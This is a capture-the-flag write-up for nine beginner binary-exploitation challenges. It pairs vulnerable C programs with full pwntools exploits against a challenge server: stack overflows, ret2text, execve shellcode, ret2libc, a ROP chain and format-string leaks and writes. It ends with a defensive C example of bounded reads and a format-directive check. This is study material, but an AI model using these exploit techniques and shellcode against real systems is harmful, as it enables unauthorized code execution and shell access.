:::info
[Challenge source](https://github.com/FlyDragonW/TaiwanHolyYoung_Pwn)
:::

:::success
[Practice site](https://tryhackme.com/r/room/pwn101)
[Reference solutions](https://hackmd.io/@vNeOEzglRpyGwr4-inKPuw/SkLKqH5OA)
:::

**0x01-pwntools**

```python
from pwn import *

r = remote('140.110.112.217', 10000)

# The first line announces the upper bound of the number to guess (last word, e.g. "100!")
line = r.recvline().decode('UTF-8').strip()
print(line)
data = int(line.split()[-1].rstrip('!'))
print(data)

# Binary search over [0, data], steered by the "Higher!" / "Lower!" replies
low, high = 0, data
while True:
    guess = (low + high) // 2
    r.sendline(str(guess).encode('UTF-8'))
    response = r.recvline().decode().strip()
    if response == 'Higher!':
        low = guess + 1
    elif response == 'Lower!':
        high = guess - 1
    else:
        print(response)   # neither hint: the guess was correct, show the final reply
        break

r.interactive()
r.close()
```

![image](https://hackmd.io/_uploads/S1Dg829SA.png)

---

**0x02-bof_var**

source code:

```c
#include <stdio.h>
#include <unistd.h>   // read()
//gcc -o bof_var bof_var.c -fno-stack-protector
int main() {
    setvbuf(stdout, NULL, _IONBF, 0);
    int key = 1234;
    puts("Please enter your name:");
    char name[16];
    read(0, name, 100);   // up to 100 bytes into a 16-byte buffer; key sits above name on the stack
    if(key == 0xfaceb00c){
        puts("FLAG{FAKE_FLAG}");
    }
    return 0;
}
```

exploit:

```python
from pwn import *

r = remote('140.110.112.217', 10001)
# 28 bytes of padding reach key on the stack, then key is overwritten with the expected value
r.sendline(b'A' * 28 + p64(0xfaceb00c))
print(r.recvline())
r.interactive()
r.close()
```

![image](https://hackmd.io/_uploads/BytoHhcrA.png)

---

**0x03-ret2text**

source code:

```c
#include <stdio.h>
#include <stdlib.h>   // system()
//gcc -o ret2text ret2text.c -fno-stack-protector -no-pie
void backdoor(){
    system("/bin/sh");
}
int main() {
    char buffer[8];
    gets(buffer);   // unbounded read into an 8-byte buffer
    return 0;
}
```

exploit:

```python
from pwn import *

r = remote('140.110.112.217', 10002)
# 8 bytes of buffer + 8 bytes of saved rbp, then the return address points at backdoor()
r.sendline(b'A' * 16 + p64(0x40115b))
r.interactive()
r.close()
```

![image](https://hackmd.io/_uploads/BJ_Xsi9SR.png)

---

**0x04-ret2sc**

source code:

```c
#include <stdio.h>
#include <unistd.h>     // read()
#include <sys/mman.h>
// gcc -o ret2sc ret2sc.c -fno-stack-protector -no-pie -z execstack
char message[50];
int main() {
    setvbuf(stdout,0,2,0);
    // make the page that holds message (.bss) readable, writable and executable
    void *mem = (void *)0x00404000;
    size_t size = 0x00405000 - 0x00404000;
    mprotect(mem, size, PROT_READ | PROT_WRITE | PROT_EXEC);
    puts("Say something to me?:");
    read(0, message, 50);
    puts("Show me ret2sc!");
    char buffer[100];
    gets(buffer);
    return 0;
}
```

exploit:

```python
from pwn import *

r = remote('140.110.112.217', 10003)
# execve("/bin//sh", NULL, NULL) shellcode; must be a bytes literal, a str would be re-encoded by pwntools
shellcode = b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"
r.recvline()
r.sendline(shellcode)                    # stored in message, which mprotect() made executable
r.recvline()
r.sendline(b'a'*136 + p64(0x404080))     # overflow buffer and return into message
r.interactive()
r.close()
```

![image](https://hackmd.io/_uploads/HymSL3780.png)

---

**0x05-ret2libc**

source code:

```c
#include <stdio.h>
// gcc -o ret2libc ret2libc.c -fno-stack-protector
int main(){
    setvbuf( stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    char address[10];
    char message[16];
    unsigned int addr ;
    puts("Can you return to library?");
    printf("Address of puts: %p\n", puts);
    printf("Address of message: %p\n", message);
    printf("Say some thing :\n");
    gets(message);
    puts("Thanks you ~");
    return 0 ;
}
```

exploit:

```python
from pwn import *

#r=process("./ret2libc")
r = remote('140.110.112.217', 10004)
r.recvline()
# the binary leaks puts@libc and the stack address of message
puts=int(r.recvline().decode().split(' ')[3],16)
mes=int(r.recvline().decode().split(' ')[3],16)
r.recvline()
# offsets inside the remote libc
puts_offset= 0x80e50
sys_offset=0xebc81
libc_base=puts-puts_offset
system=libc_base+sys_offset
rbp=mes-0x2000   # fake saved rbp, placed below message
#gdb.attach(r)
r.sendline(b'a'*32+ p64(rbp)+p64(system))
r.interactive()
r.close()
```

![image](https://hackmd.io/_uploads/B11x1J4UC.png)

---

**0x06-rop**

source code:

```c
#include <stdio.h>
#include <unistd.h>   // read()
// gcc -o rop rop.c -static -no-pie -fno-stack-protector
char message[16];
int main() {
    setvbuf( stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    char buf[8];
    puts("Leave some message:");
    read(0, message, 16);
    puts("Show me rop!");
    gets(buf);
    return 0;
}
```

exploit:

```python
from pwn import *

#r=process("./rop")
r = remote('140.110.112.217', 10005)
r.recvline()
r.sendline(b'/bin/sh\x00')   # bytes literal; stored in message (0x4c72f0) of the static binary
r.recvline()
# gadgets from the static binary
pop_rdi=0x401f2f
pop_rsi=0x409f9e
pop_rax_rdx_rbx=0x47f2ea
pop_rax=0x419484
syscall=0x401ce4
# execve(message, 0, 0): rdi=&message, rsi=0, rax=59, rdx=0 (rbx is a don't-care), then syscall
r.sendline(b'a'*16+p64(pop_rdi)+p64(0x4c72f0)+p64(pop_rsi)+p64(0)+p64(pop_rax_rdx_rbx)+p64(59)+p64(0)+p64(59)+p64(syscall))
r.interactive()
r.close()
```

![image](https://hackmd.io/_uploads/rJZLylNIC.png)

---

**0x07-fmt1**

source code:

```c
#include <stdio.h>
// gcc -o fmt_1 fmt_1.c
int main() {
    char buf[40];
    char flag[16] = "FLAG{FAKE_FLAG!}";
    scanf("%s", buf);
    printf(buf);   // user input is used as the format string
    return 0;
}
```

exploit:

```bash
parrot@G:/mnt/d/Users/cheng/Downloads$ nc 140.110.112.217 10006
%6$p,%7$p
0x7730687b47414c46,0x7d63755f6e34635f
parrot@G:/mnt/d/Users/cheng/Downloads$ python3
Type "help", "copyright", "credits" or "license" for more information.
>>> a="w0h{GALF"
>>> print(a[::-1])
FLAG{h0w
>>> b="}cu_n4c_"
>>> print(b[::-1])
_c4n_uc}
>>>
```

---

**0x08-fmt2**

source code:

```c
#include <stdio.h>
// gcc -o fmt_2 fmt_2.c
char flag[16] = "FLAG{FAKE_FLAG!}";
int main() {
    setvbuf( stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    printf("Address of flag: %p\n", flag);
    char buf[40];
    scanf("%s", buf);
    printf(buf);
    return 0;
}
```

exploit:

```python
from pwn import *

#r=process("./fmt_2")
r = remote('140.110.112.217', 10007)
# int(..., 16) accepts the 0x prefix; str.strip('0x') would also strip trailing zeros from the address
flag=int(r.recvline().decode().split()[-1],16)
# buf is argument 6; the 8-byte format string puts the flag address at argument 7
s= b'%7$s' + b'd'*4 + p64(flag)
print(hex(flag))
#gdb.attach(r)
r.sendline(s)
r.interactive()
r.close()
```

---

**0x09-fmt3**

source code:

```c
#include <stdio.h>
#include <stdlib.h>   // system()
// gcc -o fmt_3 fmt_3.c
char key = 'a';
int main() {
    setvbuf( stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    printf("Address of key: %p\n", &key);
    char buf[40];
    scanf("%s", buf);
    printf(buf);
    if(key == 'b') system("/bin/sh");
    return 0;
}
```

exploit:

```python
from pwn import *

#r=process("./fmt_3")
r = remote('140.110.112.217', 10008)
key=int(r.recvline().decode().split()[-1],16)
# print 98 ('b') characters, then %7$n stores that count into the address at argument 7 (key)
s= b'%98c%7$n' + p64(key)
print(hex(key))
#gdb.attach(r)
r.sendline(s)
r.interactive()
r.close()
```

---
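Every challenge above is exploitable because of one of two input-handling defects in the C source: an unbounded read into a fixed-size stack buffer (`read(0, name, 100)` into `name[16]`, `gets()`), or user input passed to `printf` as the format string (`printf(buf)`). The following C code is an added example, not part of this writeup or of the TaiwanHolyYoung_Pwn repository; it shows the bounded replacements a fixed version of these programs would use, plus a small check that flags format directives in untrusted data. The function names (`read_line_bounded`, `echo_untrusted`, `count_directives` and the two test wrappers) and the sample inputs are my own.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() in the test wrappers */
#include <stdio.h>
#include <string.h>

/* Replacement for gets(buffer) and for read(0, name, 100) into a 16-byte buffer:
 * reads at most cap-1 bytes, always NUL-terminates, and reports a line that did
 * not fit instead of writing past the end of dst.
 * Returns the number of bytes stored, -1 if the line was longer than the buffer
 * (the rest of the line is drained so the next read starts clean), -2 on EOF. */
int read_line_bounded(char *dst, size_t cap, FILE *in) {
    if (cap == 0) return -1;
    if (fgets(dst, (int)cap, in) == NULL) { dst[0] = '\0'; return -2; }
    size_t len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') { dst[--len] = '\0'; return (int)len; }
    /* No newline in dst: the line either ended exactly at the limit or was over-long. */
    int c = fgetc(in);
    if (c == EOF || c == '\n') return (int)len;
    while (c != '\n' && c != EOF) c = fgetc(in);   /* drain the remainder */
    return -1;
}

/* Replacement for printf(buf): the user string is an argument to a fixed format,
 * so "%7$s" or "%98c%7$n" inside it is printed literally. Returns the snprintf
 * result (bytes that would have been written). */
int echo_untrusted(char *out, size_t cap, const char *user) {
    return snprintf(out, cap, "%s", user);
}

/* Detection helper: count conversion directives in a string that is about to be
 * used as a format. A non-zero count in user-controlled data is the signature of
 * the fmt_1..fmt_3 bugs; "%%" is an escaped percent sign, not a directive. */
int count_directives(const char *s) {
    int n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }
        n++;
    }
    return n;
}

/* Test wrappers: run the functions on a constructed input and return one value.
 * The input is served from memory (fmemopen) so no real stdin is needed. */
int check_overlong(const char *line, size_t cap) {
    char buf[16];
    if (cap > sizeof buf) cap = sizeof buf;
    FILE *in = fmemopen((void *)line, strlen(line), "r");
    if (in == NULL) return -3;
    int rc = read_line_bounded(buf, cap, in);
    fclose(in);
    return rc;
}

/* 1 if echo_untrusted reproduced the user string byte for byte, else 0 */
int echo_roundtrip(const char *user) {
    char out[64];
    int n = echo_untrusted(out, sizeof out, user);
    return n >= 0 && (size_t)n < sizeof out && strcmp(out, user) == 0;
}

int main(void) {
    char name[16];
    puts("Please enter your name:");
    int rc = read_line_bounded(name, sizeof name, stdin);
    if (rc == -1) puts("input too long, truncated to 15 bytes");
    char out[64];
    echo_untrusted(out, sizeof out, name);
    printf("hello, %s (format directives in input: %d)\n", out, count_directives(name));
    return 0;
}
```

Against the inputs used above, `read_line_bounded` stores at most 15 bytes of a 44-byte line and reports the truncation instead of overwriting `key` or the saved return address, and `echo_untrusted` prints `%6$p,%7$p` as text rather than leaking stack words.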